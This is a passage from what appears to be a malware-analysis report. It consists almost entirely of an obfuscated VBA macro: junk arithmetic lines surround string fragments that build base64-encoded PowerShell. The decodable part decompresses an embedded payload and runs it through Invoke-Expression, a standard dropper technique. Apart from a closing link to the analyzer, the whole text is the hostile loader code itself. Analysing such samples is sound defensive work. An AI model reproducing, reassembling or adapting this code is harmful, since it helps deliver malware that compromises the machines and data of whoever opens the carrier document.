BOsfdaK = "AQwBh" + "AFE" + "Adg" + "BhA" + "GoAVgBx" + "AEEA" + "eA" + "BEAHAA"
aznBZ = Hex(mNHjk + Hex(aQHrZ) * 30851 + Round(wCtaoA))
NzbuYz = Cos(LOihsc)
NGzBC = CDate(pZURi)
LMzjX = Cos(AoumlN)
CMcDsXQGrd = "Yg" + "AvAGUAU" + "ABY" + "AGcAdwBWA" + "EE" + "AaQB0AHUAZQBNA" + "GwAZAB3AFoATA" + "BXAEEARgBsAGwA" + "TgBoAEcAdABaA" + "GgAdwBSAG"
kOOBd = Hex(jnNjv + Hex(Ymwwof) * 18296 + Round(KnaMi))
jsoSa = Cos(mrRoa)
rIBaw = CDate(DlzMCr)
HcBAw = Cos(CTWaoz)
ELLdkTzSEds = "IAMwAyAGM" + "AO" + "QB2ADYA" + "ZQ" + "B6ADcA" + "cABXAEMAVA" + "BkADQAdwAzAD" + "AASAB" + "DAHIATgBIA"
JaIhVJ = Hex(QoBKj + Hex(zJwHWq) * 93449 + Round(SslqU))
YEUhM = Cos(DTcdSr)
VqSaqQ = CDate(qsWOD)
CjqiXq = Cos(JzLTT)
SOorpRfc = "GkA" + "SQBvAG0AUw" + "BxAD" + "QAUwAvAGcAbQBF" + "AE4AagBsA" + "GIA" + "OQBYA" + "HkAdQ" + "BKA" + "HkAVAB5AEQAa"
ImihTp = Hex(zaUARu + Hex(MJfhGi) * 27069 + Round(TcuGb))
jYfzHs = Cos(UMLDZ)
AbPqQ = CDate(PnzSdN)
kjTBmN = Cos(pOCoB)
zIzBrMckS = "gBKAG8Acg" + "B5A" + "E8AaABWAEo" + "AOQ" + "BGAEcAdQA4AGk" + "AegB6AEUAZABS" + "AEkAYwAyAE" + "MA" + "YgBzACs" + "Aa"
EKoOwGiXbN = cAPanS + QzrOBiJ + cisjQI + BOsfdaK + CMcDsXQGrd + ELLdkTzSEds + SOorpRfc + zIzBrMckS
End Function
Function TRwZZsUzjk()
On Error Resume Next
CSszT = Hex(jGNzDl + Hex(dLCjFB) * 71870 + Round(IYBKZ))
LimZap = Cos(azvBw)
hiWlPP = CDate(jBmiw)
Psttqm = Cos(oUYaYd)
rClzAQbQLwl = "QB4AEwAVwA3" + "AEUAKwBDAE4" + "AZ" + "gBvAFIAcwBWAD" + "UAbQAxAEIARQBGA" + "EsAcgB" + "hAG8AKwBWA" + "GoAcQBXADg" + "AVwB"
YDOGhH = Hex(Ejlnl + Hex(QGKvIc) * 76066 + Round(MjDFP))
LMKwN = Cos(Tjjnjw)
kLJIGE = CDate(ihKcSv)
WLXKBS = Cos(rrZpZ)
NQQPljw = "ZAHkANwAyAHoA" + "KwA4AEoAN" + "QAxAEgA" + "aQA" + "3AEoAUgBXA"
bjaWPL = Hex(DODXwA + Hex(ZdBhd) * 33796 + Round(wXIcfi))
sTkThF = Cos(zGoNH)
mIIzN = CDate(vdOpr)
HBiJR = Cos(khAKuT)
PYKfLPb = "HIAeAB0AHUAaQB" + "uAGIANAArAF" + "YAMAA5AG8AVwBG" + "AE4ARwBsA" + "HIAaABZAE4" + "AdwBFAGc" + "ANwBqAFkASABG" + "AC8AbQAvAC" + "8AZABXAHcAc" + "AA2"
PuGcX = Hex(UWILo + Hex(JOiiJ) * 58273 + Round(sIZDlo))
ucaJbN = Cos(uwFoAq)
Wozqqt = CDate(fGwqj)
awqqV = Cos(iTswwj)
Joacj = "AFgAM" + "QBUAEQAR" + "wBnAGMAbgBSACsA" + "VAAwADUARABUADY" + "ALwBOAFUAV"
TRwZZsUzjk = rClzAQbQLwl + NQQPljw + PYKfLPb + Joacj
End Function
Function MDFzo()
On Error Resume Next
aOQYtI = Hex(BWTZNv + Hex(jPWbSu) * 91936 + Round(wHOTM))
IisBG = Cos(TtOhE)
tPEdRd = CDate(tBEVUj)
fLQJJa = Cos(itsaYG)
SUnDPzvLU = "ABCAF" + "oAZgB5AGEAZw" + "ArAEEAWAB" + "wADEAN" + "wBSA" + "FMAMwA1AFIATQBL" + "AG4AMABK" + "ACsASABzAG" + "4AOQBUA" + "FcARQBNAFkARgA4"
bnApWj = Hex(jKUql + Hex(SGDIXU) * 33754 + Round(HcFXin))
WMCsX = Cos(SNEjww)
zAvSYi = CDate(XpjCDo)
TLvRsw = Cos(JwSzNw)
wEvXa = "AFkA" + "QwBGADMA" + "SQBRAC8AQw" + "A2A" + "GsAbQA" + "1AGQA" + "RQB" + "hA"
tzbZY = Hex(jGjmwv + Hex(qhczp) * 66447 + Round(wCJOFA))
qCdVK = Cos(cipHdf)
OMiIT = CDate(mwbWSI)
BBqqMU = Cos(csEDR)
Zqnfj = "GQASQBiAEgARwA3" + "AFIAY" + "gByA" + "GEAOQBkAGoAbwA"
LiLrUW = Hex(XilXA + Hex(IOFOjK) * 24679 + Round(ianwuI))
jVIbq = Cos(kDkkBw)
ITPSpR = CDate(JXiYs)
IdHXs = Cos(NCoMd)
tdAfGvsvnH = "xAG" + "4AYQA0AE" + "4AegA2ADkAVQBE" + "AFEAZ" + "QB" + "VADMAcABrAEUAdg" + "BiAEMAWAB3AGYA"
KQXKUi = Hex(OOXOKV + Hex(dzzMr) * 69719 + Round(lWHwMr))
iwUHmW = Cos(AnzCzt)
qlOwCj = CDate(QEbUtN)
uQOIn = Cos(jRDHY)
dGsIzP = "QwBJADkAQ" + "wBPAEgAY" + "wBZAEo" + "AZQB3ADIAaA" + "B1" + "AGoAUQBEAG4AMwB" + "uAC" + "8AagB6AEkAKwBvA" + "DQ" + "AcAAzAGcASwBPA"
ddJwJs = Hex(EulszJ + Hex(fRssn) * 86998 + Round(GFXlt))
pzYhH = Cos(EGSHF)
cCJdI = CDate(OwjYO)
LTfpW = Cos(lNQfB)
NMuzKcjI = "FMAMgBzAHcA" + "cABoAEo" + "ASQ" + "AxAEQARQB" + "qAHoAVAB5" + "ADcAVwB" + "BAEYAcABYAFIAZA" + "BPAF" + "kATAAzAG4" + "AaQA4AD"
MDFzo = SUnDPzvLU + wEvXa + Zqnfj + tdAfGvsvnH + dGsIzP + NMuzKcjI
End Function
Function sEDRqjv()
On Error Resume Next
VDkbF = Hex(MKmZL + Hex(zdzAWu) * 62246 + Round(jzWot))
jvVsC = Cos(BCHFmn)
fMEmlI = CDate(ptalqV)
jXWjwh = Cos(RRouXP)
jTJur = "IANwAwAEMAJwA" + "pACA" + "ALAAgAFs" + "ASQBPAC4AYwBPAE"
zVrNjA = Hex(FfNlf + Hex(YqUkC) * 63355 + Round(RflZpF))
OuPsN = Cos(wsYjYG)
wisIv = CDate(cRawD)
qSYSjS = Cos(dzmKP)
XlIwhTPnkIk = "0AUAByAGUAcw" + "BTAEkAbw" + "BuAC4A" + "QwBPAE0AUA" + "BSA" + "GUAUwBTA" + "GkAbwBOAG0ATwBk" + "AEUAXQA6ADoAZA" + "BlAGMATw" + "BNAHAAcgBlA"
XmGjR = Hex(MvMwmm + Hex(dYcmnz) * 23024 + Round(WbZao))
BcWLT = Cos(nXiWlJ)
rwiTm = CDate(GowBKz)
DUBLh = Cos(cULSp)
nAwKMPJMw = "HMAUwAgACkAIA" + "B8ACAAJQ" + "B7ACAAbgBFAFc" + "ALQBvAGIAagBF" + "AGMAVAAgAC" + "AAa"
SJoGuG = Hex(dmUDs + Hex(mvicC) * 52897 + Round(LHZTW))
ofjqj = Cos(ojTVSi)
vJVai = CDate(IDuJu)
IqdbLk = Cos(kaRVz)
ruDzGO = "QBPAC" + "4AUwB" + "0AH" + "IAZ" + "QBhAG0"
nZEbTa = Hex(uwjCp + Hex(qCNPuV) * 72865 + Round(YnKEIk))
zddoYf = Cos(rEbbji)
JKblit = CDate(WLXzL)
PmtXKp = Cos(wVCOR)
ikHWwbwLq = "AcgBlAGEAZABF" + "AH" + "IAKAAgA" + "CQAXwAgAC" + "wA" + "IABbAFMAeQBTAH" + "QA" + "RQBNAC4AV" + "ABFAFgAVAA" + "uAE"
vKJnS = Hex(HAOcjS + Hex(rcbSGo) * 24284 + Round(fFKEQu))
BoHMT = Cos(wINXEN)
wBJKE = CDate(zqVDwa)
TQFwj = Cos(rwwZU)
DfIwjjUlLn = "UAbgBDA" + "G8" + "AZABJAE" + "4AZwBdADoAOgBhA" + "HMAYwBJAEk" + "AKQAgAH0AI"
wAtUN = Hex(BaIldv + Hex(zjwUj) * 71049 + Round(mOJhD))
oCWHw = Cos(onGjEW)
IuAwi = CDate(JwjSuc)
oJkjq = Cos(QzGwD)
bUjkCVWc = "AApAC4Ac" + "gBlAGEAZAB0AE" + "8AZQBOAGQA" + "KAAgACkAfABpAG4" + "AdgBvAGsAZQA" + "tAGUAeABQAFIARQ" + "BzAHMAa" + "QBPAG4A"
sEDRqjv = jTJur + XlIwhTPnkIk + nAwKMPJMw + ruDzGO + ikHWwbwLq + DfIwjjUlLn + bUjkCVWc
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.